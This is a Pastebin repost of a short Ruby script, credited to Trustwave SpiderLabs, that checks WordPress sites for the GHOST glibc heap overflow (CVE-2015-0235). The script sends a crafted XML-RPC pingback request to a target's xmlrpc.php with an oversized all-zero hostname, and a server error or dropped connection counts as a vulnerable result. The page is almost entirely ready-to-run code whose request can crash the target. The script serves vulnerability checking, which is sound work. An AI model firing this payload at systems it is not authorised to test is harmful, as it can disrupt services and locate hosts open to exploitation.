Googleinurl

GHOST gethostbyname() Vuln (CVE-2015-0235)

Mar 15th, 2015
814
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #
  2. # --[ Trustwave SpiderLabs Research Team ]--
  3. # Ref: http://blog.spiderlabs.com/2015/01/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235.html
  4. #
  5. require "net/http"
  6. require "uri"
  7.  
  8. if ARGV.count != 2
  9.   puts "Usage: #{ARGV[0]} [Target URL] [count]"
  10.   exit
  11. end
  12.  
  13. matched = ARGV[0].match(/(?<domain>[^\/]*)(?<path>\/.*)(\/xmlrpc.php)?/)
  14. uri = URI.parse("http://#{matched[:domain]}")
  15. ghost_host = "0"*ARGV[1].to_i
  16.  
  17. # Set up POST request
  18. payload = <<_EOF_
  19. <?xml version="1.0"?>
  20.   <methodCall>
  21.     <methodName>pingback.ping</methodName>
  22.     <params><param><value>
  23.           <string>http://#{ghost_host}/index.php</string>
  24.     </value></param>
  25.     <param><value>
  26.       <string>http://#{ghost_host}/index.php</string>
  27.     </value></param>
  28.     </params>
  29.   </methodCall>
  30. _EOF_
  31.  
  32. begin
  33.   Net::HTTP.start(uri.host, uri.port) do |http|
  34.     response = http.post("#{matched[:path]}/xmlrpc.php", payload)
  35.     if response.code == "500"
  36.       puts "Vulnerable"
  37.     else
  38.       puts "Looks like you're safe, for today"
  39.     end
  40.   end
  41. rescue EOFError
  42.   puts "Vulnerable"
  43. end
  44. #source : https://gist.github.com/rcbarnett/7564bee9f81aba746e04
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×